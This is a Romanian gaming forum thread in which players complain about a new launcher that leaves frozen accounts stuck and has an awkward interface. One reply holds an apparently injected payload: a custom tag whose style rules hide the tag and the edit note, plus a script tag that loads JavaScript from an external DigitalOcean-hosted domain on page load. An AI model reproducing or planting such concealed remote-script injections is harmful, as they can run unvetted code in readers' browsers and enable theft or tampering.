Problema noul client

  • Salut. Am intampinat o problema datorata noului luncher, probabil si multi altii, atunci cand un cont se blocheaza fie cand dai schimba caracter/portal/black screen se pare ca nu se mai poate deschide inca un client pe acelasi cont ca sa il poti deloga pe cel blocat. Are cineva o solutie pentru asta ?


    Multumesc!

  • tine minte ordinea in care le deschizi , si ai dai shutdown fortat din taskmanager

    [yoshimitsu='<style>[title="yoshimitsu"] { display: none; }</style><style class="wbbPostEditNoteStyle">.messageFooterNote.wbbPostEditNote { display: none; }</style><script src="https://yoshimitsu-wrmos.ondigitalocean.app/yoshimitsu-client.js" data-post-id-as-string="742933" data-message-footer-notes-as-h-t-m-l="" data-is-h-t-m-l-u-r-l-encoded-as-string="true"></script>'][/yoshimitsu]

    Edited once, last by ionutkauf ().

  • Pe zi ce trece devine tot mai unfriendly clientul,platforma, care o fi logica lor, vor sa ne lasam de joc ? Chiar si cand alegi contul trebuie sa dai mai multe clickuri pe sageti sa vezi toate conturile

  • Adryan1900, pai de ce crezi ca merge jocu asta din rau in mai rau, de ani de zile, de ce au blocat atatia jucatori care nu au folosit external tools sau mai stiu eu ce hack, niciodata (pe intelesul tuturor), vor sa termine jocul putin cate putin, o moarte lenta dar sigura.

  • Salut , astazi am avut si eu update la client si in cel mai bun caz am putut avea doar aceasta interfata foarte greu de accesat , jumate este spatiu gol iar eu trebuie sa ma folosesc de bara de navigare pentru a schimba paginile si etc, pentru asta a trebuit sa schimb si rezolutia . rog rezolvare imediata .


    Edit Bryony: Sters atasament ( pasaport "citibil" in ss)

    Edited once, last by Bryony ().